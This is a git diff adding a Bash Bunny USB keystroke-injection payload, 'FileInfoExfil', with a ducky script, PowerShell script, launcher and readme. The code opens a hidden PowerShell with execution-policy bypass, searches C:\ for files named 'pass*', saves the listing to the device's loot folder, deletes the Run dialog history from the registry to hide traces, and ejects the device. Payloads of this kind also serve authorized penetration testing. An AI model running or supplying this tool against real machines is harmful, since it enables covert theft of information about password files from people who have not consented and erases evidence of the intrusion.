diff --git a/payloads/library/FileInfoExfil/ducky_script.txt b/payloads/library/FileInfoExfil/ducky_script.txt new file mode 100644 index 00000000..e29d353a --- /dev/null +++ b/payloads/library/FileInfoExfil/ducky_script.txt @@ -0,0 +1,16 @@ +REM Title: FileInfoExfil +REM Creator: A_SarcasticGuy +REM Target: Windows +REM Version: 1.0 + +DELAY 500 + +GUI r + + +DELAY 1000 + + +STRING powershell -windowstyle hidden -ExecutionPolicy ByPass ".((gwmi win32_volume -f 'label=''BASHBUNNY''').Name+'payloads\p.ps1')" + +ENTER diff --git a/payloads/library/FileInfoExfil/p.ps1 b/payloads/library/FileInfoExfil/p.ps1 new file mode 100644 index 00000000..81e40d9c --- /dev/null +++ b/payloads/library/FileInfoExfil/p.ps1 @@ -0,0 +1,36 @@ +#Creator: A_SarcasticGuy +#Title: FileExfilInfo +#Target: Windows + +#Check if CapsLock key is enabled +$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock') + +#If true, toggle CapsLock key, to ensure that the script doesn't fail +if ($caps -eq $true){ + +$key = New-Object -ComObject WScript.Shell +$key.SendKeys('{CapsLock}') +} + +#Get the drive letter +$n = (gwmi win32_volume -f 'label=''BASHBUNNY''').Name + +#Create directory in loot folder to store file +mkdir $n\loot\Exfil\$env:computername + +#Find files beginning with phrase "pass*" in the directory (and sub-directories) of "C:\" ("pass*" and "C:\" are defaults, and can be changed to suit) +forfiles /P "C:\" /s /m "pass*" -c "cmd /c echo @isdir @fdate @ftime @path @fsize" >> $n\loot\Exfil\$env:computername\$(get-date -f dd-MM-yyy-hh-mm-ss).txt + +#Delete registry key to remove run dialog history +REG delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f + +Sleep 10 + +#Eject Bunny when exfil is completed as search time can vary +$Eject = New-Object -ComObject Shell.Application +$Eject.NameSpace(17).ParseName($n).InvokeVerb("Eject") + +#N.B Bunny will not eject if still in use, and scans can take quite a large amount of time, for example if scanning a full Hard Disk. + +#Close Powershell process, should it still remain open +$host.SetShouldExit(0) \ No newline at end of file diff --git a/payloads/library/FileInfoExfil/payload.txt b/payloads/library/FileInfoExfil/payload.txt new file mode 100644 index 00000000..e7e08bfa --- /dev/null +++ b/payloads/library/FileInfoExfil/payload.txt @@ -0,0 +1,60 @@ +#Title: FileInfoExfiltrator +#Author: A_SarcasticGuy +#Version: 1.0 +#Target: Windows +# +#Runs Powershell that calls a .ps1 file to scan (in all subdirectories of path provided) for all files (by default starting on c:/) beginning with a #specific phrase (default "pass*") to then #be outputted to a text file in the loot directory, in a subfolder with the name of the system and with a #file name of the date and time of the scan. +# +# Options: Search Directory: Find in p.bat (default c:/) +# Search criteria: Find in p.bat (default "pass*") +# +# Purple LED..................Script Started +# Yellow LED..................Ducky Script Started +# Red LED.....................Failed to run Ducky Script, see log file +# +# NOTE: p.ps1 MUST be in loot/payloads/ for this to work. +# + +LED B R + +ATTACKMODE HID STORAGE + + + +# Set language +QUACK SET_LANGUAGE gb + + +# Source bunny_helpers.sh to allow the value fo SWITCH_POSITION to be returned +source bunny_helpers.sh + + + +if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then + + +#Call ducky script +LED R G + + +QUACK ${SWITCH_POSITION}/ducky_script.txt + + +QUACK DELAY 10000 + +LED R G B + +else + + +LED R + + +#Red LED if unable to load script +echo "Unable to load ducky_script.txt" >> /root/debuglog.txt + + +exit 1 + + +fi diff --git a/payloads/library/FileInfoExfil/readme.md b/payloads/library/FileInfoExfil/readme.md new file mode 100644 index 00000000..827a61ad --- /dev/null +++ b/payloads/library/FileInfoExfil/readme.md @@ -0,0 +1,27 @@ +## Exfiltrate File Information + +Author: @A_SarcasticGuy +Target: Windows +Version: Version 1.0 + +## Description + +Exfiltrate file information if they start with a specific passphrase, and once complete the Bunny should be ejected + +NOTE: The Bunny will only be ejected when it is not in use, so if the scan is still continuing it will fail to eject + +## Configuration + +HID STORAGE + +## Requirements + +p.ps1 file MUST be in /payloads folder. + +## STATUS + +| LED | Status | +| ---------------- | ------------------------------------- | +| Purple | Script Started | +| Yellow | Ducky Script Started | +| Red | Failed to find Ducky Script |